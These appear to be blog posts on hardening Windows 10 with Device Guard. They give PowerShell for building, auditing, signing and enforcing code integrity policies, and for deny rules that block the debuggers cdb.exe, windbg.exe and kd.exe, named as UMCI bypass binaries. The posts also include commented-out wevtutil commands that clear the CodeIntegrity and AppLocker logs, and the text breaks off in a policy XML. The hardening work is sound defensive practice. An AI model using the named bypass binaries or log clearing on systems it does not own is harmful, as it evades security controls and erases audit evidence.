Before we get started, I highly recommend that you read the official Microsoft documentation on Device Guard and also watch the Ignite 2015 talk detailing Device Guard design and configuration - Dropping the Hammer Down on Malware Threats with Windows 10’s Device Guard (PPTX, configuration script). The Ignite talk covers some aspects of Device Guard that are not officially documented.


You can download the fully documented code I used to generate my code integrity policy. You can also download the finalized code integrity policy that the code below generated for my personal Surface Pro 4. Now, absolutely do not just deploy that to your system. I’m only providing it as a reference for comparison to the code integrity policy that you create for your system. Do not complain that it might be overly permissive (because I know it is in some respects) and please do not ask why this policy doesn’t work on your system. You also probably wouldn't want to trust code signed by my personal code-signing certificate. ;)


In the Ignite talk linked above, Scott and Jeffrey describe creating a code integrity policy for a golden system by scanning the computer for all binaries present on it and allowing any driver, script, MSI, application, or DLL to execute based on the certificate used to sign those binaries/scripts. While this is, in my opinion, a relatively simple way to establish an initial policy, in practice I consider this approach to be overly permissive. When I used this methodology on my fresh install of Windows 10 Enterprise Anniversary Update with Chrome installed, the generated code integrity policy consisted of what would be considered normal certificates mixed in with several test signing certificates. Personally, I don’t want to grant anything permission to run that was signed with a test certificate. Notable certificates present in the generated policy were the following:


  • Microsoft Windows Phone Production PCA 2012
  • MSIT Test CodeSign CA 6
  • OEMTest OS Root CA
  • WDKTestCert wdclab,130885612892544312

Upon finding such certificate oddities, I decided to tackle development of a code integrity policy another way – create an empty policy (i.e. deny everything), configure Device Guard in audit mode, and then craft my policy based on what was loaded and denied in the CodeIntegrity event log.


So now let’s dive into how I configured my Surface Pro 4. For starters, I only wanted signed Microsoft code to execute (with a couple of third-party hardware driver exceptions). Is this a realistic configuration? It depends, but probably not. You’re probably going to want non-Microsoft code to run as well. That’s fine. We can configure that later, but my personal goal is to only allow Microsoft code to run since everyone using Device Guard will need to do that at a minimum. I will then have a pristine, locked-down system which I can use to research ways of gaining unsigned code execution with signed Microsoft binaries. Now, just to be clear, if you want your system to be able to boot and apply updates, you’ll obviously need to allow code signed by Microsoft to run. So to establish my “golden system,” I did the following:


  1. Performed a fresh install of Windows 10 Enterprise Anniversary Update.
  2. Ensured that it was fully updated via Windows Update.

In the empty, template policy, I have the following policy rules enabled:

  1 - Unsigned System Integrity Policy (during policy configuration/testing phases)


Signing your code integrity policy makes it so that deployed policies cannot be removed (assuming they are locked in UEFI using VBS protections) and that they can only be updated using approved code signing certificates as specified in the policy.


  2 - Audit Mode (during policy configuration/testing phases)


I want to simulate denying execution of everything on the system that attempts to load. After I perform normal computing tasks on my computer for a while, I will then develop a new code integrity policy based upon the certificates used to sign everything that would have been denied in the Microsoft-Windows-CodeIntegrity/Operational and Microsoft-Windows-AppLocker (it is not documented that Device Guard pulls from the AppLocker log) logs.


  3 - Advanced Boot Options Menu (during policy configuration/testing phases)

If I somehow misconfigure my policy, deploy it, and my Surface no longer boots, I’ll need a fallback option to recover. This option allows me to reboot, hold down F8 to access a recovery prompt, and delete the deployed code integrity policy if I have to. Note: you might be thinking that this would be an obvious Device Guard bypass for someone with physical access. Well, if your policy is not in audit mode and it is required to be signed, you can delete the deployed code integrity policy from disk, but it will return unharmed after a reboot. Configuring BitLocker would prevent an attacker with physical access from viewing and deleting files from disk via the recovery prompt, though.

  4 - UMCI

We want Device Guard to not only apply to drivers but to user-mode binaries, MSIs, and scripts as well.

  5 - WHQL


Only load drivers that are Windows Hardware Quality Labs (WHQL) signed. This is supposed to be a mandate for all new Windows 10-compatible drivers so we’ll want to make sure we enforce it.

  6 - EV Signers

We want to only load drivers that are not only WHQL signed but also signed with an extended validation certificate. This is supposed to be a requirement for all drivers in Windows 10 Anniversary update. Unfortunately, as we will later discover, this is not the case; not even for all Microsoft drivers (specifically, my Surface Pro 4-specific hardware drivers).

Several other policy rules will be described in subsequent steps. For details on all the available, configurable policy rule options, read the official documentation.

What will follow will be the code and rationale I used to develop my personal code integrity policy. This is a good time to mention that there is never going to be a one size fits all solution for code integrity policy development. I am choosing a relatively locked down, semi-unrealistic policy that will most likely form a minimal basis for pretty much any other code integrity policy out there.


Configuration Phase #1 - Deny-all audit policy deployment

In this configuration phase, I’m going to create an empty, template policy placed in audit mode that will simulate denying execution of every driver, user-mode binary, MSI, and script. After running my system for a few days and getting a good baseline for the programs I’m going to execute (excluding third party binaries since I only want MS binaries to run), I can generate a new policy based on what would have been denied execution in the event log.


There is no standard method of generating an empty policy so what I did was call New-CIPolicy and have it generate a policy from a completely empty directory.


It is worth noting at this point that I will be deploying all subsequent policies directly to %SystemRoot%\System32\CodeIntegrity\SIPolicy.p7b. You can, however, configure an alternate file path from which CI policies should be pulled via Group Policy, and I believe you have to set this location via Group Policy if you’re using a signed policy file (at least from my experimentation). This procedure is documented here. You had damn well better make sure that no user has write access to the directory where the policy file is contained if an alternate path is specified with Group Policy.
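
As a quick sanity check against that mistake, you can dump any write-capable ACEs on the policy directory ('C:\CIPolicy' here is a placeholder for whatever alternate path you configure):

(Get-Acl -Path 'C:\CIPolicy').Access |
    Where-Object { $_.FileSystemRights -match 'Write|Modify|FullControl' } |
    Select-Object IdentityReference, FileSystemRights, AccessControlType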


What follows is the code I used to generate and deploy the initial deny-all audit policy. I created a C:\DGPolicyFiles directory to contain all my policy related files. You can use any directory you want though.


# The staging directory I'm using for my Device Guard setup
$PolicyDirectory = 'C:\DGPolicyFiles'

# Path to the empty template policy that will place Device Guard
# into audit mode and simulate denying execution of everything.
$EmptyPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'EmptyPolicy.xml'

# Generate an empty, deny-all policy.
# There is no intuitive way to generate an empty policy so we will
# go about doing it by generating a policy based on an empty directory.
$EmptyDir = Join-Path -Path $PolicyDirectory -ChildPath 'EmptyDir'
mkdir -Path $EmptyDir
New-CIPolicy -FilePath $EmptyPolicyXml -Level PcaCertificate -ScanPath $EmptyDir -NoShadowCopy
Remove-Item $EmptyDir

# Only load drivers that are WHQL signed
Set-RuleOption -FilePath $EmptyPolicyXml -Option 2

# Enable UMCI enforcement
Set-RuleOption -FilePath $EmptyPolicyXml -Option 0

# Only allow drivers to load that are WHQL signed by trusted MS partners
# who sign their drivers with an extended validation certificate.
# Note: this is an idealistic setting that will probably prevent some of your
# drivers from loading. Enforcing this in audit mode however will at least
# inform you as to what the problematic drivers are.
Set-RuleOption -FilePath $EmptyPolicyXml -Option 8

# A generated policy will also have the following policy options set by default:
# * Unsigned System Integrity Policy
# * Audit Mode
# * Advanced Boot Options Menu
# * Enforce Store Applications

# In order to deploy the policy, the XML policy has to be converted
# to p7b format with the ConvertFrom-CIPolicy cmdlet.
$EmptyPolicyBin = Join-Path -Path $PolicyDirectory -ChildPath 'EmptyPolicy.bin'
ConvertFrom-CIPolicy -XmlFilePath $EmptyPolicyXml -BinaryFilePath $EmptyPolicyBin

# We're going to copy the policy file in binary format to here. By simply copying
# the policy file to this destination, we're deploying our policy and enabling it
# upon reboot.
$CIPolicyDeployPath = Join-Path -Path $env:SystemRoot -ChildPath 'System32\CodeIntegrity\SIPolicy.p7b'
Copy-Item -Path $EmptyPolicyBin -Destination $CIPolicyDeployPath -Force

# At this point, you may want to clear the Microsoft-Windows-CodeIntegrity/Operational
# event log and increase the size of the log to accommodate the large amount of
# entries that will populate the event log as a result of an event log entry being
# created upon code being loaded.

# Optional: Clear Device Guard related logs
# wevtutil clear-log Microsoft-Windows-CodeIntegrity/Operational
# wevtutil clear-log "Microsoft-Windows-AppLocker/MSI and Script"

# Reboot the computer and the deny-all audit policy will be in place.


Configuration Phase #2 - Code integrity policy creation based on audit logs

Hopefully, you’ve run your system for a while and established a good baseline of all the drivers, user-mode binaries (including DLLs), and scripts that are necessary for you to do your job. If that’s the case, then you are ready to generate the next code integrity policy based solely on what was reported as denied in the event log.
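
Before generating the policy, it's worth eyeballing what actually landed in the audit log. A quick sketch (treat the 3076 event ID, the audit-mode "would have been blocked" event, as an assumption and verify it against your own CodeIntegrity log):

Get-WinEvent -LogName 'Microsoft-Windows-CodeIntegrity/Operational' |
    Where-Object { $_.Id -eq 3076 } |
    Select-Object -First 10 -Property TimeCreated, Message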


When generating this new code integrity policy, I will specify the PcaCertificate file rule level, which is probably the best level for this round of CI policy generation as it is the highest in the code signing certificate signer chain and has a longer validity time frame than a leaf certificate (i.e. the lowest in the signing chain). You could use more restrictive file rules (e.g. LeafCertificate, Hash, FilePublisher, etc.), but you would be weighing updatability against increased security. For example, you should be careful when whitelisting third-party PCA certificates, as a malicious actor would just need to be issued a code signing certificate from that third-party vendor as a means of bypassing your policy. Also, consider a scenario where a vulnerable older version of a signed Microsoft binary is used to gain code execution. If this is a concern, consider using a file rule level like FilePublisher, or WHQLFilePublisher for WHQL-signed drivers.
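
For example, if you wanted tighter driver rules than PcaCertificate, something along these lines would tie each rule to the signer, file name, and minimum file version (a sketch; adjust the scan path to taste):

New-CIPolicy -FilePath '.\StrictDriverPolicy.xml' -Level FilePublisher -ScanPath "$env:SystemRoot\System32\drivers\"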


Now, when we call New-CIPolicy to generate the policy based on the audit log, you may notice a lot of warning messages claiming that it is unable to locate a bunch of drivers on disk. This appears to be an unfortunate path parsing bug – a problem that we will address in the next configuration phase.



Driver path parsing bug

# Hopefully, you've spent a few days using your system for its intended purpose and didn't
# install any software that would compromise the "gold image" that you're aiming for.
# Now we're going to craft a CI policy based on what would have been denied from loading.
# Obviously, these are the kinds of applications, scripts, and drivers that will need to
# execute in order for your system to work as intended.

# The staging directory I'm using for my Device Guard setup
$PolicyDirectory = 'C:\DGPolicyFiles'

# Path to the CI policy that will be generated based on the entries present
# in the CodeIntegrity event log.
$AuditPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'AuditLogPolicy.xml'

# Generate the CI policy based on what would have been denied in the event logs
# (i.e. Microsoft-Windows-CodeIntegrity/Operational and Microsoft-Windows-AppLocker/MSI and Script)
# PcaCertificate is probably the best file rule level for this round of CI policy generation
# as it is the highest in the code signing cert signer chain and it has a longer validity time frame
# than a leaf certificate (i.e. lowest in the signing chain).
# This may take a few minutes to generate the policy.
# The resulting policy will result in a rather concise list of whitelisted PCA certificate signers.
New-CIPolicy -FilePath $AuditPolicyXml -Level PcaCertificate -Audit -UserPEs

# Note: This policy, when deployed, will still remain in audit mode as we should not be confident
# at this point that we've gotten everything right.

# Now let's deploy the new policy
$AuditPolicyBin = Join-Path -Path $PolicyDirectory -ChildPath 'AuditLogPolicy.bin'
ConvertFrom-CIPolicy -XmlFilePath $AuditPolicyXml -BinaryFilePath $AuditPolicyBin

# We're going to copy the policy file in binary format to here. By simply copying
# the policy file to this destination, we're deploying our policy and enabling it
# upon reboot.
$CIPolicyDeployPath = Join-Path -Path $env:SystemRoot -ChildPath 'System32\CodeIntegrity\SIPolicy.p7b'
Copy-Item -Path $AuditPolicyBin -Destination $CIPolicyDeployPath -Force

# Optional: Clear Device Guard related logs
# wevtutil clear-log Microsoft-Windows-CodeIntegrity/Operational
# wevtutil clear-log "Microsoft-Windows-AppLocker/MSI and Script"

# Reboot the computer and the audit policy will be in place.


Configuration Phase #3 - Code integrity policy final tweaks while still in audit mode

In this phase, we’ve rebooted and noticed that there are a bunch of drivers that wouldn’t have loaded if we actually enforced the policy. This is due to the driver path parsing issue I described in the last section. Until this bug is fixed, I believe there are two realistic methods of handling this:

  • Use a PowerShell script to pull the flagged driver paths from the event log, copy those drivers to a dedicated directory, generate a new policy based on the drivers in that directory, and then merge that policy with the policy we generated in phase #2 (a rough sketch of the extraction step follows this list). I personally had some serious issues with this strategy in practice.
  • Generate a policy by scanning %SystemRoot%\System32\drivers and then merge that policy with the policy we generated in phase #2. For this blog post, that’s what we will do, out of simplicity. The only reason I hesitate to use this strategy is that I don’t want to be overly permissive and whitelist certificates for drivers I don’t use that might be issued by a non-Microsoft public certification authority.
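
For those who want to attempt the first option anyway, the extraction step might look something like the following sketch. The event ID (3076, the audit-mode event) and the message parsing are assumptions; adjust them to match your own CodeIntegrity log entries:

# Copy the drivers flagged in audit mode to a staging directory for a targeted scan.
$Staging = 'C:\DGPolicyFiles\FlaggedDrivers'
mkdir -Path $Staging -Force | Out-Null

Get-WinEvent -LogName 'Microsoft-Windows-CodeIntegrity/Operational' |
    Where-Object { $_.Id -eq 3076 } |
    ForEach-Object {
        # Pull the driver file name out of the event message text.
        if ($_.Message -match '\\Drivers\\(?<Name>[^\\\s]+\.sys)') {
            Join-Path "$env:SystemRoot\System32\drivers" $Matches['Name']
        }
    } |
    Sort-Object -Unique |
    Where-Object { Test-Path $_ } |
    ForEach-Object { Copy-Item -Path $_ -Destination $Staging }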

Additionally, one of the side effects of this bug is that the generated policy from phase #2 only has rules for user-mode code and not drivers. We obviously need driver rules.


# My goal in this phase is to see what remaining CodeIntegrity log entries
# exist and to try to rectify them while still in audit mode before placing
# code integrity into enforcement mode.

# For me, I had about 30 event log entries that indicated the following:
#
# Code Integrity determined that a process (Winload) attempted to load
# System32\Drivers\mup.sys that did not meet the Authenticode signing
# level requirements or violated code integrity policy. However, due to
# code integrity auditing policy, the image was allowed to load.

# Upon trying to create a new policy based on these event log entries via the following command
# New-CIPolicy -FilePath Audit2.xml -Level PcaCertificate -Audit
# I got a bunch of the following warnings:
#
# File at path \\?\GLOBALROOTSystem32\Drivers\Wof.sys in the audit log was not found.
# It has likely been deleted since it was last run
#
# Ugh. No it wasn't deleted. This looks like a path parsing bug. Personally, I'm
# comfortable trusting all drivers in %SystemRoot%\System32\Drivers so I'm going
# to create a policy from that directory and merge it with my prior one. After all,
# my system would not boot if I didn't whitelist them.

$PolicyDirectory = 'C:\DGPolicyFiles'

# Path to the CI policy that will be generated based on a scan of System32\drivers.
$DriverPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'SystemDriversPolicy.xml'

# Create a whitelisted policy for all drivers in System32\drivers to account for
# the New-CIPolicy audit log scanning path parsing bug...
# Note: this really annoying bug prevented any rules in the previous phase from being created
# for drivers - only user-mode binaries and scripts. If I were to deploy and enforce a policy without
# driver whitelist rules, I'd have an unbootable system.
New-CIPolicy -FilePath $DriverPolicyXml -Level PcaCertificate -ScanPath 'C:\Windows\System32\drivers\'

# Some may consider this strategy to be too permissive (myself partially included). The ideal strategy
# here probably would have been to pull out the individual driver paths, copy them to a dedicated
# directory and generate a policy for just those drivers. For the ultra paranoid, this is left as an
# exercise to the reader.

# Now we have to merge this policy with the last one as a means of consolidating whitelist rules.
$AuditPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'AuditLogPolicy.xml'
$MergedAuditPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.xml'
Merge-CIPolicy -OutputFilePath $MergedAuditPolicyXml -PolicyPaths $DriverPolicyXml, $AuditPolicyXml

# Now let's deploy the new policy
$MergedAuditPolicyBin = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.bin'
ConvertFrom-CIPolicy -XmlFilePath $MergedAuditPolicyXml -BinaryFilePath $MergedAuditPolicyBin

# We're going to copy the policy file in binary format to here. By simply copying
# the policy file to this destination, we're deploying our policy and enabling it
# upon reboot.
$CIPolicyDeployPath = Join-Path -Path $env:SystemRoot -ChildPath 'System32\CodeIntegrity\SIPolicy.p7b'
Copy-Item -Path $MergedAuditPolicyBin -Destination $CIPolicyDeployPath -Force

# Optional: Clear Device Guard related logs
# wevtutil clear-log Microsoft-Windows-CodeIntegrity/Operational
# wevtutil clear-log "Microsoft-Windows-AppLocker/MSI and Script"

# Reboot the computer and the merged policy will be in place.


Configuration Phase #4 - Deployment of the CI policy in enforcement mode

Alright, we’ve rebooted and the CodeIntegrity log no longer presents the entries for drivers that would not have been loaded. Now we’re going to simply remove audit mode from the policy, redeploy, reboot, and cross our fingers that we have a working system upon reboot.


# This is the point where I feel comfortable enforcing my policy. The CodeIntegrity log
# is now only populated with a few anomalies - e.g. primarily entries related to NGEN
# native image generation. I'm okay with blocking these but hopefully, the Device Guard
# team can address how to handle NGEN generated images properly since this is not documented.

$PolicyDirectory = 'C:\DGPolicyFiles'
$MergedAuditPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.xml'

# Now all we need to do is remove audit mode from the policy, redeploy, reboot, and cross our
# fingers that the system is usable. Note that the "Advanced Boot Options Menu" option is still
# enabled so we have a way to delete the deployed policy from a recovery console if things break.
Set-RuleOption -FilePath $MergedAuditPolicyXml -Delete -Option 3

$MergedAuditPolicyBin = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.bin'
ConvertFrom-CIPolicy -XmlFilePath $MergedAuditPolicyXml -BinaryFilePath $MergedAuditPolicyBin

$CIPolicyDeployPath = Join-Path -Path $env:SystemRoot -ChildPath 'System32\CodeIntegrity\SIPolicy.p7b'
Copy-Item -Path $MergedAuditPolicyBin -Destination $CIPolicyDeployPath -Force

# Optional: Clear Device Guard related logs
# wevtutil clear-log Microsoft-Windows-CodeIntegrity/Operational
# wevtutil clear-log "Microsoft-Windows-AppLocker/MSI and Script"

# Reboot the computer and the enforced policy will be in place. This is the moment of truth!


Configuration Phase #5 - Updating policy to no longer enforce EV signers

So it turns out that I was a little overambitious in forcing EV signer enforcement on my Surface tablet, as pretty much none of my Surface hardware drivers loaded. This is kind of a shame considering I would expect MS hardware drivers to be held to the highest standards imposed by MS. So I'm going to remove EV signer enforcement and, while I'm at it, enforce blocking of flight-signed drivers. These are drivers signed by an MS test certificate used in Windows Insider Preview builds, so obviously, you won't want to be running WIP builds of Windows if you're enforcing this.


FYI, I was fortunate that the system still booted, which allowed me to discover that EV signature enforcement was the issue.


$PolicyDirectory = 'C:\DGPolicyFiles'

$MergedAuditPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.xml'


# No longer enforce EV signers

Set-RuleOption -FilePath $MergedAuditPolicyXml -Delete -Option 8


# Enforce blocking of flight signed code.

Set-RuleOption -FilePath $MergedAuditPolicyXml -Option 4


$MergedAuditPolicyBin = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.bin'


ConvertFrom-CIPolicy -XmlFilePath $MergedAuditPolicyXml -BinaryFilePath $MergedAuditPolicyBin


$CIPolicyDeployPath = Join-Path -Path $env:SystemRoot -ChildPath 'System32\CodeIntegrity\SIPolicy.p7b'


Copy-Item -Path $MergedAuditPolicyBin -Destination $CIPolicyDeployPath -Force


# Optional: Clear Device Guard related logs

# wevtutil clear-log Microsoft-Windows-CodeIntegrity/Operational

# wevtutil clear-log "Microsoft-Windows-AppLocker/MSI and Script"


# Reboot the computer and the modified, enforced policy will be in place.


# In retrospect, it would have been smart to have enabled "Boot Audit on Failure"

# with Set-RuleOption, as it would have placed Device Guard into audit mode for that boot

# session, allowing boot drivers to load that would have otherwise been blocked by policy.
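
# For reference, enabling that option before redeployment would have looked something like
# the following (per "Set-RuleOption -Help", option 10 maps to "Enabled:Boot Audit On Failure" -
# verify that mapping on your build before relying on it):
# Set-RuleOption -FilePath $MergedAuditPolicyXml -Option 10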


Configuration Phase #6 - Monitoring and continued hardening

At this point we have a decent starting point and I'll leave it up to you as to how you'd like to proceed in terms of CI policy configuration and deployment.


Me personally, I performed the following:


  1. Used Add-SignerRule to add an Update and User signer rule with my personal code signing certificate. This grants me permission to sign my policy and to execute user-mode binaries and scripts signed by me. I need to sign some of my frequently used PowerShell code since it is incompatible with constrained language mode; signed scripts authorized by CI policy execute in full language mode. Obviously, I need to sign my own code sparingly. For example, it would be dumb for me to sign Invoke-Shellcode since that would explicitly circumvent user-mode code integrity.
  2. Remove "Unsigned System Integrity Policy" from the configuration. This forces me to sign the policy. It also prevents modification and removal of a deployed policy and it can only be updated by signing an updated policy.
  3. I removed the "Boot Menu Protection" option from the CI policy. This is a potential vulnerability to an attacker with physical access.
  4. I also enabled virtualization-based security via group policy to achieve the hardware supported Device Guard enforcement/improvements.

What follows is the code I used to allow my code signing cert to sign the policy and sign user-mode binaries. Obviously, this is specific to my personal code-signing certificate.

# I don't plan on using my code signing cert to sign drivers so I won't allow that right now.

# Note: I'm performing these steps on an isolated system that contains my imported code signing

# certificate. I don't have my code signing cert on the system that I'm protecting with

# Device Guard hopefully for obvious reasons.


$PolicyDirectory = 'C:\DGPolicyFiles'

$CodeSigningCertPath = Join-Path $PolicyDirectory 'codesigning.cer'

$MergedAuditPolicyXml = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.xml'


Add-SignerRule -FilePath $MergedAuditPolicyXml -CertificatePath $CodeSigningCertPath -User -Update


$MergedAuditPolicyBin = Join-Path -Path $PolicyDirectory -ChildPath 'MergedAuditPolicy.bin'


ConvertFrom-CIPolicy -XmlFilePath $MergedAuditPolicyXml -BinaryFilePath $MergedAuditPolicyBin


# I'm signing my code integrity policy now.

signtool.exe sign /v /n "Matthew Graeber" /p7 . /p7co 1.3.6.1.4.1.311.79.1 /fd sha256 $MergedAuditPolicyBin


# Now, once I deploy this policy, I will only be able to make updates to the policy by

# signing an updated policy with the same signing certificate.


Virtualization-based Security Enforcement

My Surface Pro 4 has the hardware to support these features so I would be silly not to employ them. This is easy enough to do in Group Policy. After configuring these settings, reboot and validate that all Device Guard features are actually set. The easiest way to do this in my opinion is to use the System Information application.


Enabling Virtualization Based Security Features

Confirmation of Device Guard enforcement
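
If you prefer to validate from a console rather than the System Information application, the Win32_DeviceGuard WMI class exposes the same status information. A minimal sketch (the property names are those the class exposes on Windows 10; confirm on your build):

# Query VBS/Device Guard status. SecurityServicesRunning and
# VirtualizationBasedSecurityStatus reflect what System Information displays.
Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard |
    Select-Object -Property VirtualizationBasedSecurityStatus, SecurityServicesConfigured, SecurityServicesRunning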

Conclusion

If you’ve made it this far, congratulations! Considering there’s no push-button solution to configuring Device Guard according to your requirements, it can take a lot of experimentation and practice. That said, I don’t think there should ever be a push-button solution to the development of a strong whitelisting policy catered to your specific environment. It takes a lot of work, just as competently defending your enterprise should take a lot of work rather than just throwing money at "turnkey solutions".


Examples of blocked applications and scripts

Now at this point, you may be asking the following questions (I know I did):


  • How much of a pain will it be to update the policy to permit new applications? This would in essence require a reference machine that you can place into audit mode during a test period of the new software installation. You would then need to generate a new policy based on the audit logs and hope that all loaded binaries are signed. If not, you’d have to fall back to file hash rules, which would force you to update the policy again as soon as a new update comes out. This process is complicated by installer applications; configuring portable binaries should be much easier since their footprint is much smaller.
  • What if there’s a signed Microsoft binary that permits unsigned code execution? Oh these certainly exist and I will cover these in future blog posts along with realistic code integrity policy deny rule mitigations.
  • What if a certificate I whitelist is revoked? I honestly don’t think Device Guard currently covers this scenario.
  • What are the ways in which an admin (local or remote) might be able to modify or disable Device Guard? I will attempt to enumerate some of these possibilities in future blog posts.
  • What is the fate of AppLocker? That is a question only Microsoft can answer.
  • I personally have many more questions but this blog post may not be the appropriate forum to air all possible grievances. I have been in direct contact with the Device Guard team at Microsoft and they have been very receptive to my feedback.

Finally, despite the existence of bypasses, code integrity policies can in many cases be supplemented to mitigate known bypasses. In the end, Device Guard will significantly raise the cost to an attacker and block most forms of malware that don't specifically take Device Guard bypasses into consideration. I commend Microsoft for putting some serious thought and engineering into Device Guard and I sincerely hope that they will continue to improve it, document it more thoroughly, and evangelize it. Now, I may be overly optimistic, but I would hope that they would consider any vulnerabilities in the Device Guard implementation, and possibly even unsigned code execution from signed Microsoft binaries, to be a security boundary. But hey, a kid can dream, right?


I hope you enjoyed this post! Look forward to more Device Guard posts (primarily with an offensive twist) coming up!

Using Device Guard to Mitigate Against Device Guard Bypasses

8 September 2016 at 16:38
In my last post, I presented an introduction to Device Guard and described how to go about developing a fairly locked down code integrity policy - a policy that consisted entirely of implicit allow rules. In this post, I’m going to describe how to deny execution of code that would otherwise be whitelisted according to policy. Why would you want to do this? Well, as I blogged about previously, one of the easiest methods of circumventing user-mode code integrity (UMCI) is to take advantage of signed applications that can be used to execute arbitrary, unsigned code. In the blog post, I achieved this using one of Microsoft’s debuggers, cdb.exe. Unfortunately, cdb.exe isn’t the only signed Microsoft binary that can circumvent a locked down code integrity policy. In the coming months, Casey Smith (@subtee) and I will gradually unveil additional signed binaries that circumvent UMCI. In the spirit of transparency, Casey and I will release bypasses as we find them but we will only publicize bypasses for which we can produce an effective mitigation. Any other bypass would be reported to Microsoft through the process of coordinated disclosure.


While the existence of bypasses may cause some to question the effectiveness of Device Guard, consider that the technique I will describe will block all previous, current, and future versions of binaries that circumvent UMCI. The only requirement is that the binaries be signed with a code signing certificate in the same chain as the PCA certificate used when we created the deny rule - a realistic scenario. What I’m describing is the FilePublisher file rule level.


In the example that follows, I will create a new code integrity policy with explicit deny rules for all signed versions of the binaries I’m targeting up to the highest supported version number (65535.65535.65535.65535) – cdb.exe, windbg.exe, and kd.exe – three user-mode and kernel-mode debuggers signed by Microsoft. You can then merge the denial CI policy with that of your reference policy. I confirmed with the Device Guard team at Microsoft that what I’m about to describe is most likely the ideal method (at time of writing) of blocking the execution of individual binaries that bypass your code integrity policy.


# The directory that contains the binaries that circumvent our Device Guard policy

$Scanpath = 'C:\Program Files\Windows Kits\10\Debuggers\x64'


# The binaries that circumvent our Device Guard policy

$DeviceGuardBypassApps = 'cdb.exe', 'windbg.exe', 'kd.exe'


$DenialPolicyFilePath = 'BypassMitigationPolicy.xml'


# Get file and signature information for every file in the scan directory

$Files = Get-SystemDriver -ScanPath $Scanpath -UserPEs -NoShadowCopy


# We'll use this to filter out the binaries we want to block

$TargetFilePaths = $DeviceGuardBypassApps | ForEach-Object { Join-Path $Scanpath $_ }


# Filter out the user-mode binaries we want to block

# This would just as easily apply to drivers. Just change UserMode to $False

# If you want this to apply to drivers though, you might consider using

# the WHQLFilePublisher rule.

$FilesToBlock = $Files | Where-Object {

    $TargetFilePaths -contains $_.FriendlyName -and $_.UserMode -eq $True

}


# Generate a dedicated device guard bypass policy that contains explicit deny rules for the binaries we want to block.

New-CIPolicy -FilePath $DenialPolicyFilePath -DriverFiles $FilesToBlock -Level FilePublisher -Deny -UserPEs



# Set the MinimumFileVersion to 65535.65535.65535.65535 - an arbitrarily high number.

# Setting this value to an arbitrarily high version number ensures that any signed bypass binary

# prior to version 65535.65535.65535.65535 will be blocked. This logic allows us to theoretically

# block all previous, current, and future versions of binaries, assuming they were signed

# with a certificate signed by the specified PCA certificate.

$DenyPolicyRules = Get-CIPolicy -FilePath $DenialPolicyFilePath

$DenyPolicyRules | Where-Object { $_.TypeId -eq 'FileAttrib' } | ForEach-Object {

    # For some reason, the docs for Edit-CIPolicyRule say not to use it...

    Edit-CIPolicyRule -FilePath $DenialPolicyFilePath -Id $_.Id -Version '65535.65535.65535.65535'


}



# The remaining portion is optional. It is here to demonstrate

# policy merging with a reference policy and deployment.



<#

$ReferencePolicyFilePath = 'FinalPolicy.xml'

$MergedPolicyFilePath = 'Merged.xml'

$DeployedPolicyPath = 'C:\DGPolicyFiles\SIPolicy.bin'

#>


# Extract just the file rules from the denial policy. We do this because we don't want to merge

# and possibly overwrite any policy rules from the reference policy.

<#

$Rules = Get-CIPolicy -FilePath $DenialPolicyFilePath

Merge-CIPolicy -OutputFilePath $MergedPolicyFilePath -PolicyPaths $ReferencePolicyFilePath -Rules $Rules

#>


# Deploy the new policy and reboot.

<#

ConvertFrom-CIPolicy -XmlFilePath $MergedPolicyFilePath -BinaryFilePath $DeployedPolicyPath

#>


So in the code above, to generate the policy, we specified the location where the offending binaries were installed. In reality, they can be in any directory, and you can generate this deny policy on any machine. In other words, you’re not required to generate it on the machine that will have the code integrity policy deployed. That directory is then scanned, the specific binaries you want to deny are filtered out, and the deny policy is merged with a reference policy and redeployed. Once you’ve redeployed the policy, you will want to validate its efficacy. To validate it, I would ensure the following:

  1. Both the x86 and x64 version of the binary are blocked.
  2. At least two versions of each binary (for each architecture) are blocked.

So, for example, to validate that the signed cdb.exe can no longer execute, be sure to obtain two versions of cdb.exe and have a 32-bit and 64-bit build of each version.
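
As a quick sanity check, you can also attempt to launch one of the blocked binaries and confirm that a corresponding block event was logged. A sketch, assuming the debugger path used earlier (to my knowledge, event ID 3077 is the enforced UMCI block event and 3076 its audit-mode counterpart):

# Attempt to run a blocked binary, then pull recent enforcement events from the CodeIntegrity log.
& 'C:\Program Files\Windows Kits\10\Debuggers\x64\cdb.exe'
Get-WinEvent -LogName 'Microsoft-Windows-CodeIntegrity/Operational' -MaxEvents 10 |
    Where-Object { $_.Id -eq 3077 } |
    Format-List -Property TimeCreated, Message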


It is unfortunately kind of a hack to have to manually modify the policy XML to specify an arbitrarily large version number. Ideally, in a future version of Device Guard, Microsoft would allow you to specify a wildcard that would imply that the deny rule would apply to all versions of the binary. In the meantime, this hack seems to get the job done. What’s great about this simple workflow is that as new bypasses come out, you can just keep adding deny rules to an all-encompassing Device Guard bypass code integrity policy! In fact, I plan on maintaining such a bypass-specific CI policy on GitHub in the near future.


Now, I’ve done a decent amount of testing of this mitigation, which I consider to be effective and not difficult to implement. I encourage everyone out there to poke holes in my theory, though. And if you discover a bypass for my mitigation, please be a good citizen and let the world know! I hope these posts are continuing to pique your interest in this important technology!


For reference, here is the policy that was generated based on the code above. Note that while there are explicit file paths in the generated policy, the deny rules apply regardless of where the binaries are located on disk.



<?xml version="1.0" encoding="utf-8"?>

<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">

  <VersionEx>10.0.0.0</VersionEx>

  <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>

  <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>

  <Rules>

    <Rule>

      <Option>Enabled:Unsigned System Integrity Policy</Option>

    </Rule>

    <Rule>

      <Option>Enabled:Audit Mode</Option>

    </Rule>

    <Rule>

      <Option>Enabled:Advanced Boot Options Menu</Option>

    </Rule>

    <Rule>

      <Option>Required:Enforce Store Applications</Option>

    </Rule>

    <Rule>

